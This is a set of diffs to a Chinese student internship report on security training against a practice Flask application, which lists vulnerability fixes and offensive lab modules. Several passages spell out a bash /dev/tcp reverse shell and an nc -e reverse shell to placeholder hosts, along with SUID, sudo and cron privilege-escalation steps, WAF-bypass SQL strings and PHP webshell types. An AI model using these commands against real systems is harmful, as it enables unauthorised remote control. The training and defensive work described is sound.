--- a/网络安全实践-2实习报告-王宇杨.docx
+++ b/网络安全实践-2实习报告-王宇杨.docx
@@ -1295,7 +1295,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>本次实训以 Kali Linux 为操作平台，以一个完整的 Flask Web 用户管理系统为靶标项目，从攻防双视角系统性地开展了为期九天的安全实训。实训覆盖了 OWASP Top 10 中绝大部分核心漏洞类型及渗透测试进阶技术。具体内容如下：</w:t>
+              <w:t>实训以 Kali Linux 为基础平台，以 Flask Web 用户管理系统为实训项目，从攻防双视角系统性地开展了以下实训内容：</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1312,7 +1312,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>1. 环境搭建与基础配置（Day 1）：完成 Kali Linux 系统初始化配置与工具链安装；部署 OpenClaw AI 系统并对接 QQ Bot 通道，实现通过 QQ 与 AI Agent 交互的能力；将项目 Fork 至个人 GitHub 仓库，建立 Git 版本管理规范。</w:t>
+              <w:t>0x01 Kali 操作系统初始化：完成 Kali Linux 2026 的安装与系统初始化配置，包括系统更新、网络配置、中文环境设置、基础工具链（git、curl、wget、python3 等）安装，建立标准化的渗透测试工作环境。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1329,7 +1329,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>2. 密码安全与暴力破解防御（Day 1-2）：梳理常见系统默认账号密码，建立安全意识基线；配置 Burp Suite 代理并掌握请求拦截、修改、重放等核心功能；使用 Burp Suite Intruder 模块搭配字典进行暴力破解攻击实验。防护措施：在项目中实现指数退避延迟算法、图形验证码、账号锁定机制（5次失败锁定15分钟）、密码哈希存储及时间线攻击防护。</w:t>
+              <w:t>0x02 AI 系统安装：部署 OpenClaw AI Agent 系统，完成基础配置与插件安装，建立 AI 辅助安全分析的工作环境，为后续自动化漏洞分析和报告撰写奠定基础。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1346,7 +1346,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>3. SQL 注入漏洞修复（Day 2）：项目初始版本使用 f-string 拼接 SQL 语句，存在严重注入风险。攻击者可输入 admin 万能密码绕过认证或在搜索接口使用 UNION SELECT 读取任意表数据。修复方案：将所有 SQL 操作改为参数化查询，明文密码改为哈希存储，限制用户输入长度。</w:t>
+              <w:t>0x03 OpenClaw 安装对接 QQ Bot：完成了 OpenClaw AI Agent 与 QQ Bot 通道的对接配置，实现了通过 QQ 与 AI Agent 实时交互的能力，包括消息接收、命令执行、结果反馈等功能的调试与验证。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1363,7 +1363,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>4. 越权漏洞修复（Day 2）：存在垂直越权漏洞，未登录用户可直接访问 /profile、/upload 等需认证页面。修复方案：新增 login_required 装饰器，未登录自动重定向至登录页；同时增加水平越权防护，校验当前用户仅能访问自己的数据。</w:t>
+              <w:t>0x04 密码安全：系统学习了密码安全相关知识，包括：0x01 常见部署系统默认用户密码（路由器、数据库、中间件等默认账号密码梳理）；0x02 用户名密码泄露（泄露途径分析：数据库注入、日志泄漏、社工库等；密码保护策略）；0x03 TOP7 CVE-2026-40910 frp 漏洞（frp 内网穿透工具的最新高危漏洞分析与利用）；0x04 Burp Suite 安装（Kali 下 Burp Suite Community/Professional 的安装配置过程）；0x05 代理设置（Burp Suite 代理监听配置、浏览器代理设置、HTTPS 证书导入）；0x06 BP 进行字典攻击（使用 Burp Suite Intruder 模块搭配密码字典对登录接口进行暴力破解攻击实验）。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1380,7 +1380,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>5. CSRF 漏洞修复（Day 3）：所有需认证的 POST 操作存在 CSRF 风险。修复方案：使用 Flask-WTF 的 CSRFProtect 中间件全局启用 CSRF 令牌验证，所有表单添加隐藏的 csrf_token 字段。</w:t>
+              <w:t>0x05 文件上传实验：在实训项目中测试了文件上传功能的安全性，发现存在路径穿越漏洞（可通过 ../../ 上传到任意目录）和 Content-Type 绕过漏洞（修改请求头即可上传任意恶意文件）。修复方案：使用 werkzeug.secure_filename() 处理文件名、新增文件魔数（Magic Number）校验验证真实文件类型、限制上传文件大小。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1397,7 +1397,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>6. 文件上传漏洞修复（Day 2-3）：存在路径穿越和仅检查 Content-Type 头两种绕过方式。修复方案：使用 werkzeug.secure_filename() 处理文件名，新增文件魔数（Magic Number）校验验证真实文件类型，限制上传文件大小为 2MB。</w:t>
+              <w:t>0x06 越权：在实训项目中测试了用户权限控制的有效性，发现存在垂直越权（未登录可直接访问需要认证的页面）和水平越权（可访问其他用户的个人信息）两类漏洞。修复方案：新增 login_required 装饰器统一认证管理、在个人中心等页面校验当前用户仅能操作自己的数据。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1414,7 +1414,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>7. 文件包含与 XSS 漏洞修复（Day 4）：/page 路由存在本地文件包含漏洞，昵称、搜索框等多处存在 XSS 漏洞。修复方案：文件包含使用 os.path.normpath + os.path.realpath 双重路径校验；XSS 修复使用 html.escape() 对所有用户输入进行 HTML 实体转义。</w:t>
+              <w:t>0x07 绕过：以 SQLi-LABS 靶场为实验环境，开展了 WAF 绕过 Fuzz 测试，掌握了多种绕过技术：注释符绕过（/**/）、大小写混淆（UnIoN SeLeCt）、双写绕过（UNUNIONION）、编码绕过（URL 编码、Unicode 编码）等技巧，深入理解了 WAF 检测规则与绕过思路。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1431,7 +1431,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>8. SSRF 漏洞修复（Day 5）：/fetch-url 路由服务端未对用户提交 URL 做任何过滤，可访问内网服务。修复方案：URL 协议白名单（仅 http/https）、内网地址黑名单过滤、自定义 DNS 解析验证、socket 超时控制。</w:t>
+              <w:t>0x08 文件包含：在实训项目中测试了 /page 路由的文件读取功能，发现存在本地文件包含漏洞，可通过 ../ 路径穿越读取系统文件（/etc/passwd 等）。修复方案：使用 os.path.normpath + os.path.realpath 双重路径解析、校验文件路径严格在 pages 目录下、对读取内容做 HTML 转义同时防御 XSS。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1448,7 +1448,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>9. SSTI 模板注入修复（Day 6）：/welcome 和 /feedback 使用 render_template_string 拼接用户输入，可注入模板语法泄露密钥或通过对象继承链执行任意代码实现 RCE。修复方案：新增 safe_str() 函数对所有用户输入执行 html.escape() 转义后再拼接。</w:t>
+              <w:t>0x09 CSRF 漏洞：在实训项目中测试了跨站请求伪造攻击，所有需要认证的 POST 操作均未携带 CSRF Token，攻击者可构造恶意页面诱导用户触发操作。修复方案：使用 Flask-WTF 的 CSRFProtect 中间件全局启用 CSRF 保护、所有表单添加隐藏的 csrf_token 字段。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1480,7 +1480,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>通过本次为期九天的网络安全实训，我系统性地构建了 Web 安全的知识体系，从最初仅了解漏洞概念，到能够独立分析漏洞原理、编写攻击载荷、完成修复方案并输出专业漏洞报告，全过程覆盖了 SQL 注入、越权、CSRF、文件上传绕过、文件包含、XSS、SSRF、SSTI、命令注入等 OWASP Top 10 核心漏洞类型。</w:t>
+              <w:t>通过本次为期九天的网络安全实训，我从 Kali Linux 基础操作到 Web 安全漏洞深度修复，系统性地构建了完整的网络安全知识体系。本次实训内容涵盖了从底层系统操作到上层 Web 应用安全的全链路技术栈，包括 0x01 Kali 系统初始化、0x02 AI 系统安装、0x03 OpenClaw+QQBot 对接、0x04 密码安全与暴力破解（含 Burp Suite 安装配置、代理设置、字典攻击、frp 漏洞分析）、0x05 文件上传漏洞、0x06 越权漏洞、0x07 WAF 绕过、0x08 文件包含、0x09 CSRF 漏洞、0x10 NPS 内网穿透、0x11 Linux 利用手法、0x12 PHP 反弹木马、0x13 Shell 反弹手法共 13 个实训模块。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1489,7 +1489,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>在工具使用方面，熟练掌握了 Kali Linux 操作系统环境、Burp Suite 进行 HTTP 流量分析与字典攻击、OpenClaw AI Agent 辅助漏洞分析与报告生成、Git 进行版本管理与协同开发等安全从业人员必备技能。</w:t>
+              <w:t>在实训项目的安全加固实践中，我将上述安全知识转化为具体的漏洞修复行动，完成了 Flask 用户管理系统从初始版本到全面安全加固的完整演进，累计修复了 SQL 注入、越权、CSRF、文件上传绕过、文件包含、XSS、SSRF、SSTI 模板注入、命令注入等 9 大类安全漏洞，共计完成 20 次 Git 提交，生成 8 份 Word 格式的独立漏洞修复报告存档于 GitHub 仓库。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1504,7 +1504,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>本次实训的一大特色是将 AI Agent 深度集成到安全工作流中。AI 不仅辅助完成了漏洞分析、修复代码编写和报告文档的自动生成，还通过自动化工具有条理地管理项目文件、执行 Git 操作，极大提升了工作效率。这让我深刻认识到 AI 在安全领域的应用前景——AI 不会替代安全工程师，但能大幅提升安全工作的效率和质量。</w:t>
+              <w:t>在工具使用方面，熟练掌握了安全从业人员必备的核心技能：Kali Linux 作为渗透测试基础平台、Burp Suite 进行 HTTP 流量分析拦截与字典攻击、OpenClaw AI Agent 辅助漏洞分析报告生成、Git 进行版本管理与协同开发。特别是在 Burp Suite 的使用上，完成了从安装配置、代理设置到 Intruder 模块字典攻击的完整实战链路。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1513,7 +1513,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>实训最大的收获是安全思维的建立。Web 应用的安全性由每一个输入点、每一个输出点、每一条数据库查询、每一次系统调用共同决定。安全不是靠单个功能实现的，它需要渗透到开发的全生命周期。九天的修复历程展示了安全是一个持续的、迭代的过程，这种持续安全的理念将贯穿我未来的职业生涯。</w:t>
+              <w:t>本次实训的另一重要收获是内网渗透与系统利用能力的建立。通过 NPS 客户端配置掌握了内网穿透隧道建立方法；通过 Linux 常见利用手法学习了 SUID 提权、计划任务利用、sudo 配置错误等系统层面攻击技术；通过 PHP 反弹木马和多种 Shell 反弹手法掌握了远程控制与权限维持的核心技能。这些进阶内容让我对网络安全的理解从 Web 层深入到了系统层和网络层。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1522,11 +1522,25 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>本次实训共完成 20 次 Git 提交，生成 8 份独立漏洞修复报告（Word 格式），累计修复 9 大类安全漏洞，实现了从初始版本到全面安全加固的完整演进。项目代码及全部文档已推送至 GitHub 仓库存档。</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>实训最大的收获是安全思维的建立。从 SQL 注入到命令注入，从越权到 CSRF，每一个漏洞的修复都让我更深刻地理解：安全不是某个独立的功能模块，而是贯穿开发全生命周期的持续过程。从攻击者视角理解漏洞利用，从防御者视角设计修复方案——这种双向思维将伴随我未来的技术成长。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x13 Shell 反弹手法：掌握了多种反向 Shell 的构造方式：bash 反弹（bash -i &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1）、nc 反弹（nc -e /bin/sh IP PORT）、Python 反弹（socket + subprocess 实现）、PHP 反弹（fsockopen + exec 实现），理解了正向连接与反向连接的不同应用场景及防火墙穿透原理。</w:t>
+            </w:r>
+          </w:p>
           <w:p/>
           <w:p/>
           <w:p/>

--- a/网络安全实践-2实习报告-王宇杨.docx
+++ b/网络安全实践-2实习报告-王宇杨.docx
@@ -1346,7 +1346,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>0x03 OpenClaw 安装对接 QQ Bot：完成了 OpenClaw AI Agent 与 QQ Bot 通道的对接配置，实现了通过 QQ 与 AI Agent 实时交互的能力，包括消息接收、命令执行、结果反馈等功能的调试与验证。</w:t>
+              <w:t>0x03 OpenClaw 安装对接 QQ Bot：完成 OpenClaw AI Agent 与 QQ Bot 通道的对接配置，实现了通过 QQ 与 AI Agent 实时交互的能力，包括消息接收、命令执行、结果反馈等功能的调试与验证。</w:t>
             </w:r>
           </w:p>
           <w:p>

--- a/网络安全实践-2实习报告-王宇杨.docx
+++ b/网络安全实践-2实习报告-王宇杨.docx
@@ -1312,13 +1312,20 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>0x01 Kali 操作系统初始化：完成 Kali Linux 2026 的安装与系统初始化配置，包括系统更新、网络配置、中文环境设置、基础工具链（git、curl、wget、python3 等）安装，建立标准化的渗透测试工作环境。</w:t>
+              <w:t>0x01 Kali 操作系统初始化：完成 Kali Linux 2026 的安装与系统初始化配置，包括系统更新、网络配置、中文环境设置、基础工具链（git、curl、wget、python3 等）安装，建立标准化的渗透测试工作环境。了解了 Kali 内置的各类安全工具分类与用途，掌握软件包管理、用户权限管理、服务管理、网络配置等基础运维操作。</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x02 AI 系统安装：部署 OpenClaw AI Agent 系统，完成基础配置与插件安装，熟悉 AI Agent 的架构设计和工作原理。通过配置 AI 辅助安全分析的环境，实现了利用大语言模型进行代码审计、漏洞分析、方案设计和报告自动生成的能力。</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1329,13 +1336,20 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>0x02 AI 系统安装：部署 OpenClaw AI Agent 系统，完成基础配置与插件安装，建立 AI 辅助安全分析的工作环境，为后续自动化漏洞分析和报告撰写奠定基础。</w:t>
+              <w:t>0x03 OpenClaw 安装对接 QQ Bot：完成 OpenClaw AI Agent 与 QQ Bot 通道的对接配置，包括 Bot 的注册申请、权限配置、消息路由设置。实现了通过 QQ 与 AI Agent 实时交互的能力，包括消息接收、命令执行、结果反馈等功能的调试与验证。</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x04 密码安全：系统学习了密码安全相关知识。0x01 常见部署系统默认用户密码：梳理路由器、数据库（MySQL、PostgreSQL）、中间件、物联网设备等常见系统默认账号密码，建立安全意识基线。0x02 用户名密码泄露：分析泄露途径（数据库注入、日志泄露、社工学、撞库攻击等）及密码保护策略。0x03 TOP7 CVE-2026-40910 frp 漏洞：分析 frp 内网穿透工具的最新高危漏洞。0x04 Burp Suite 安装：Kali 下 JDK 环境配置、社区版/专业版对比、扩展插件使用。0x05 代理设置：配置代理监听 127.0.0.1:8080、导入 CA 证书实现 HTTPS 解密。0x06 BP 字典攻击：Intruder 模块搭配 Kali wordlists 字典库进行爆破攻击，Payload 设置与结果分析筛选。</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1346,13 +1360,20 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>0x03 OpenClaw 安装对接 QQ Bot：完成 OpenClaw AI Agent 与 QQ Bot 通道的对接配置，实现了通过 QQ 与 AI Agent 实时交互的能力，包括消息接收、命令执行、结果反馈等功能的调试与验证。</w:t>
+              <w:t>0x05 文件上传实验：发现路径穿越漏洞（../../etc/shell.php）和 Content-Type 绕过漏洞。修复方案：使用 werkzeug.secure_filename() 处理文件名、新增文件魔数校验读取文件头字节验证真实类型（PNG:89 50 4E 47、JPEG:FF D8、GIF:47 49 46 38）、限制文件大小 2MB、设置上传目录不可执行权限。</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x06 越权：发现垂直越权（未登录用户可直接访问需认证页面）和水平越权（修改 user_id 可查看他人信息）。修复方案：新增 login_required 装饰器统一认证管理，在敏感接口校验当前用户仅能操作自己的数据。</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1363,13 +1384,20 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>0x04 密码安全：系统学习了密码安全相关知识，包括：0x01 常见部署系统默认用户密码（路由器、数据库、中间件等默认账号密码梳理）；0x02 用户名密码泄露（泄露途径分析：数据库注入、日志泄漏、社工库等；密码保护策略）；0x03 TOP7 CVE-2026-40910 frp 漏洞（frp 内网穿透工具的最新高危漏洞分析与利用）；0x04 Burp Suite 安装（Kali 下 Burp Suite Community/Professional 的安装配置过程）；0x05 代理设置（Burp Suite 代理监听配置、浏览器代理设置、HTTPS 证书导入）；0x06 BP 进行字典攻击（使用 Burp Suite Intruder 模块搭配密码字典对登录接口进行暴力破解攻击实验）。</w:t>
+              <w:t>0x07 WAF 绕过：以 SQLi-LABS 靶场开展 Fuzz 测试，掌握注释符绕过、大小写混淆（UnIoN SeLeCt）、双写绕过（UNUNIONION）、编码绕过（URL/Unicode/Hex）、HTTP 参数污染（HPP）等技巧。</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x08 文件包含：/page 路由存在本地文件包含漏洞，可读取 /etc/passwd 等系统文件，结合文件上传可实现 RCE。修复方案：使用 os.path.normpath + os.path.realpath 双重路径校验，确保路径在 pages/ 目录前缀下，同时对内容做 HTML 转义防止 XSS。</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1380,13 +1408,20 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>0x05 文件上传实验：在实训项目中测试了文件上传功能的安全性，发现存在路径穿越漏洞（可通过 ../../ 上传到任意目录）和 Content-Type 绕过漏洞（修改请求头即可上传任意恶意文件）。修复方案：使用 werkzeug.secure_filename() 处理文件名、新增文件魔数（Magic Number）校验验证真实文件类型、限制上传文件大小。</w:t>
+              <w:t>0x09 CSRF 漏洞：所有 POST 操作（改密、充值、上传等）未携带 CSRF Token，攻击者可通过构造恶意页面诱导用户执行非预期操作。修复方案：Flask-WTF CSRFProtect 中间件全局启用 CSRF 保护，所有表单添加隐藏的 csrf_token 字段。</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x10 NPS 客户端配置：掌握 NPS 架构原理（服务端+客户端模式）、服务端部署配置（端口绑定、认证密钥）、客户端连接配置（VKEY 验证）、隧道协议选择（TCP/UDP/HTTP/SOCKS5 各协议适用场景）。通过配置客户端隧道实现外网访问内网服务。</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1397,13 +1432,20 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>0x06 越权：在实训项目中测试了用户权限控制的有效性，发现存在垂直越权（未登录可直接访问需要认证的页面）和水平越权（可访问其他用户的个人信息）两类漏洞。修复方案：新增 login_required 装饰器统一认证管理、在个人中心等页面校验当前用户仅能操作自己的数据。</w:t>
+              <w:t>0x11 Linux 常见利用手法：SUID 提权（find / -perm -4000 查找利用）、计划任务利用（检查 crontab 插入恶意命令）、sudo 配置错误（sudo -l 查看权限利用不当配置提权）、内核漏洞提权（Dirty Pipe、PwnKit 等）。</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x12 PHP 反弹 Shell 木马使用：编写 PHP 一句话木马（eval/assert/preg_replace 型），结合反向 Shell 实现 WebShell 管理。掌握大马与小马的区别、WebShell 管理工具（蚁剑、冰蝎、哥斯拉）配置与流量特征分析。</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1414,7 +1456,7 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>0x07 绕过：以 SQLi-LABS 靶场为实验环境，开展了 WAF 绕过 Fuzz 测试，掌握了多种绕过技术：注释符绕过（/**/）、大小写混淆（UnIoN SeLeCt）、双写绕过（UNUNIONION）、编码绕过（URL 编码、Unicode 编码）等技巧，深入理解了 WAF 检测规则与绕过思路。</w:t>
+              <w:t>0x13 Shell 反弹手法：bash 反弹（bash -i &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1）、nc 反弹（nc -e /bin/sh）、Python 反弹（socket+dup2+subprocess）、PHP 反弹（fsockopen+exec）。掌握正向连接与反向连接的应用场景及防火墙穿透原理。</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1426,13 +1468,6 @@
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x08 文件包含：在实训项目中测试了 /page 路由的文件读取功能，发现存在本地文件包含漏洞，可通过 ../ 路径穿越读取系统文件（/etc/passwd 等）。修复方案：使用 os.path.normpath + os.path.realpath 双重路径解析、校验文件路径严格在 pages 目录下、对读取内容做 HTML 转义同时防御 XSS。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1443,13 +1478,6 @@
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x09 CSRF 漏洞：在实训项目中测试了跨站请求伪造攻击，所有需要认证的 POST 操作均未携带 CSRF Token，攻击者可构造恶意页面诱导用户触发操作。修复方案：使用 Flask-WTF 的 CSRFProtect 中间件全局启用 CSRF 保护、所有表单添加隐藏的 csrf_token 字段。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -1459,12 +1487,14 @@
                 <w:bCs/>
                 <w:sz w:val="28"/>
               </w:rPr>
+              <w:t>三、实习总结（可另附报告）</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
                 <w:sz w:val="28"/>
               </w:rPr>
+              <w:t>：</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1474,77 +1504,59 @@
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-            </w:r>
+              <w:t>通过本次为期九天的网络安全实训，我从 Kali Linux 基础操作到 Web 安全漏洞深度修复，系统性地构建了完整的网络安全知识体系。本次实训内容涵盖从底层系统操作到上层 Web 应用安全的全链路技术栈，包括 0x01 Kali 系统初始化、0x02 AI 系统安装、0x03 OpenClaw+QQBot 对接、0x04 密码安全与暴力破解（含 Burp Suite 安装配置、代理设置、字典攻击、默认密码梳理、密码泄露分析、frp 漏洞分析共六项）、0x05 文件上传漏洞、0x06 越权漏洞、0x07 WAF 绕过、0x08 文件包含漏洞、0x09 CSRF 漏洞、0x10 NPS 内网穿透、0x11 Linux 利用手法、0x12 PHP 反弹木马、0x13 Shell 反弹手法共 20 余个细分知识点，做到了理论与实践的紧密结合。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>通过本次为期九天的网络安全实训，我从 Kali Linux 基础操作到 Web 安全漏洞深度修复，系统性地构建了完整的网络安全知识体系。本次实训内容涵盖了从底层系统操作到上层 Web 应用安全的全链路技术栈，包括 0x01 Kali 系统初始化、0x02 AI 系统安装、0x03 OpenClaw+QQBot 对接、0x04 密码安全与暴力破解（含 Burp Suite 安装配置、代理设置、字典攻击、frp 漏洞分析）、0x05 文件上传漏洞、0x06 越权漏洞、0x07 WAF 绕过、0x08 文件包含、0x09 CSRF 漏洞、0x10 NPS 内网穿透、0x11 Linux 利用手法、0x12 PHP 反弹木马、0x13 Shell 反弹手法共 13 个实训模块。</w:t>
-            </w:r>
-          </w:p>
+              <w:t>在实训项目的安全加固实践中，我将上述安全知识转化为具体的漏洞修复行动，完成了 Flask 用户管理系统从初始版本到全面安全加固的完整演进。项目覆盖用户注册登录、个人资料管理、头像上传、URL 抓取、搜索、页面管理、Ping 网络诊断等完整功能链，累计修复了 SQL 注入、越权、CSRF、文件上传绕过、文件包含、XSS、SSRF、SSTI 模板注入、命令注入等 9 大类安全漏洞。修复过程严格遵循安全开发规范，每一处修复都经过漏洞原理分析、攻击载荷验证、修复方案设计、代码实现、回归测试的完整闭环，共计完成 20 次 Git 提交，生成 8 份 Word 格式的独立漏洞修复报告存档于 GitHub 仓库。通过这些实操，我深刻体会到一个功能正常的 Web 应用在安全层面可能存在的巨大隐患，也建立了所有用户输入不可信的安全编码思维。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
           <w:p>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>在实训项目的安全加固实践中，我将上述安全知识转化为具体的漏洞修复行动，完成了 Flask 用户管理系统从初始版本到全面安全加固的完整演进，累计修复了 SQL 注入、越权、CSRF、文件上传绕过、文件包含、XSS、SSRF、SSTI 模板注入、命令注入等 9 大类安全漏洞，共计完成 20 次 Git 提交，生成 8 份 Word 格式的独立漏洞修复报告存档于 GitHub 仓库。</w:t>
-            </w:r>
-          </w:p>
+              <w:t>在工具使用方面，熟练掌握了安全从业人员必备的核心技能。Kali Linux 作为渗透测试基础平台，使用其内置的各类安全工具完成从信息收集到漏洞利用的完整流程。Burp Suite 的熟练使用是本次实训的重要收获之一，从代理配置安装 CA 证书到 HTTPS 流量解密、从请求拦截修改到 Intruder 模块的字典攻击全流程操作均已掌握。OpenClaw AI Agent 的使用让我体验了 AI 辅助安全工作的新范式，大幅提升了工作效率。Git 版本管理则让我养成了规范的代码管理习惯。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
           <w:p>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-            </w:r>
+              <w:t>本次实训的另一重要收获是内网渗透与系统利用能力的建立。通过 NPS 客户端配置掌握了内网穿透隧道建立方法，理解正向代理与反向代理的区别及不同隧道协议适用场景。通过 Linux 常见利用手法学习了 SUID 提权、计划任务利用、sudo 配置错误利用、内核漏洞提权等系统层面攻击技术。通过 PHP 反弹木马和多种 Shell 反弹手法掌握了远程控制与权限维持的核心技能，对网络安全的认知从 Web 应用层面拓展到系统层和网络层。</w:t>
+            </w:r>
